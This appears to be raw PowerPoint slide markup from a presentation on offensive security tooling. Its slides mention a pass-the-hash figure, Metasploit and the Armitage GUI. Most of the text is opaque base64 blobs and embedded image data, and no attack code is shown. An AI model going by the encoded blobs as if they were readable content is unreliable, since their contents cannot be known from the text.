GLEY3vdEyVjnxgGRgc1z2A7i5gN238q5HTYcIcdpIaVojtgTuSaDsa9zZHX2/vOJWvassKJxCmAfMyrp3TOrW/JMmS99lTUOmu4Ovs5hN+jpUDpesTTV9J8lFHNEXSYjHS1I5kpYHC7muG3I7+q3mTceBSwU8EbI6VkkEra6PGmtrZHtcGnnXawuJyl28237zuO1n37jwKJLI3o4BM8EsLejgEzwVdI4tGzqvL7uHzYnUmKCSVoBMcT3gHcS1pcL+TYtE0B01r66L5bWwUsVEYZHiRjy12dhsQ4Pecrdjtp8S3XHu9Z+ry/A5cY1MxYbJBJBle6smo52VbXZ+SdT5r2G3LuybvKrJi2z49rVM2GRV+HHky+ujpntkEb3taSb3aHENva48i3HSHSIw0lTNSOgllpgRkdMxjGy3AyyuzANO2+UkE7tl7rhlNh7BoxA9rQHT4qwSkEhz8pe1vT0A22L7K2gZTx6SwQtDY4zTNY0EnKOV8pv0lB3KkxpvyeGaofFE6dkezlWFhleAcjH3s/adlt69KrHIInFstRCwtYJHB8jGERk2DyHH7N7C+5cWxqGMVGDSYjDJNQHC4omtY10rflZadmRm0uN49g32G+xWI0+hiZV4y2shkdUP5CTDn5XOayDMA52YbGty5W3Oy4tvQdZx3SyWPFsMpYXsMFc2Z0tg1+drW5mFr/Fu3Ldlx7/AHjo11F/YBdhCD5sVqjDBLK0AmOJ8jQdxLWlwv5Ni53JrOqBg1JiXIxcpVVTYJG2kyNaXvbdvOvezRvJ3rfdIe9Kjq8vwOS8DQ+mjwWhxJrXComrWRyOzktLeUeNjN25rUDFVWLxQuyyzRMOVz7Pkaw8m37TrOI5o6TuCiTGoWxtmdPEI5CBHIZGNY8ncGvJs6/kK4ZrGgjbieKfLoZZJJaNjsMcGvc1ga1ud1wbBrdtzu2OvvVq2KMQYBJXwyS0IpnRytYHPby7r5AWt2knm2A2mxsg6NQaYSnHK2jllYKWlo452khrMhc2Iuc6Q9HPdv8AGtr/AE3ByTZ/lEXJPdlbJyjMjnE2Aa++Um+ywK4JrAw98mJYl8nuI4aGjlnitkdJSsEBczxty81x8w+JfXp/JDNJQVDSWYY7D+TpbQGsjiqAXAxckHttJbI25dvb5Cg7nUYpFG9kb5Y2vlvybXPa10gG05Wk3dYeIL6IZQ9oexwc1wDmuBDg5p2ggjYQR0rhtZgIfPo9R1XKPY6Koa9srTBIYjZzWPY17svNsLZt2w+JdwpKZsUbYo2hrI2BjGjc1rRYAeoIPZCEIIUOCshBQNRlV0IKWUZV6IQeeVTZXQgplUPGw8FdUl3KAsrOjgEzjVx1up+q/bU+wfrSfkXYmrilO31dHl5QamoZ6XmvT6eu9r3+/wB2SVWyspXcyymVRZeiEFLIyq6EFLKwUoQQVUhWUFBW3+rqcqsFKCmX/W9FldCDzylXClCAQhCD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9" descr="data:image/jpeg;base64,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7410" name="Picture 2" descr="http://linux.devicegadget.com/wp-content/uploads/2011/03/Figure-7.-Pass-the-Hash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19602" y="1676400"/>
            <a:ext cx="4343398" cy="28956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228785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2426" y="457201"/>
            <a:ext cx="8181974" cy="1219200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> GUI?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7974" y="1143000"/>
            <a:ext cx="8531225" cy="5029200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Enter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Armitage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!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Created by Raphael </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Mudge</a:t>
            </a:r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r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.fastandeasyhacking.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="AutoShape 4" descr="data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBhQPEBQPDxAUFBQPEBQQDxUVFRcPFBAQFRgZFBQVFBQXHCgeGBklGhQUIC8gIycpLS0tFR4yNTArNSYrLSkBCQoKDAwOFA4PFDUkHiM1NSkwLSk1LDUuNSw1KTUpNTU2KSs1KSk1Ly8pNTUpKjUpKSstNiw1LCkrNS4sLDIpNf/AABEIALAA6wMBIgACEQEDEQH/xAAcAAACAgMBAQAAAAAAAAAAAAAACAECBQYHAwT/xABMEAABAwICBQULCAgDCQAAAAABAAIDBBEFEgYHITFxEyJBdLMINDVRYXJzgZGxshQXIyUyM1XSFVJTYnWSoeFCQ/BERVRjgqLC0eP/xAAYAQEAAwEAAAAAAAAAAAAAAAAAAQUGBP/EACYRAQAABAUEAgMAAAAAAAAAAAABBAYRQkSBgsECAxITBTEhQVH/2gAMAwEAAhEDEQA/AO4oQhAIQhAIQhAIQhBCpLuV1WTceCgcv+ea/wDsW8ft/wD5LqLdyWNnRwCZ0Ljle719zy8otN8/8fLSfp9HTa97/mMfq39uFKhSu1mQhCEAhCEAhCEAhCEAhCEAoJUrzmbcEA22GxG8bN4QXzKMy1DCYJHVNYx1XUFtJLE2IF7Tma+lY5wdzdvOeXX8dujYsJV6UVAwqaPlyK2lhD5JbDM6HI2WOYNItzw5rN32g8b2oOl3UrzjFha/9/7r0QCEIQCEIQCEIQCEIQQqybjwVlWTceCiKSyN6PUmdCWJvRwCZ0KukcWjZ1Xl93AUqFKsmLCEIQCEIQCEIQCEIQCEIQCiylCD4Y8Gia6V7WWdU25c5nc+zcgvt2c0AbLbl5TaN0743QuhaWPiZA8XIL4Y75GOcDctGZ2wn/EVk0IKtZbZ/dWQhAIQhAIQoQShVDlhcS02oaUls9bAxzftNMjS8cWAkj2IM4hai3WxhZIH6Qi2+eP6lqzmG6R01VspqmGUgXIjkbIQPKAbhB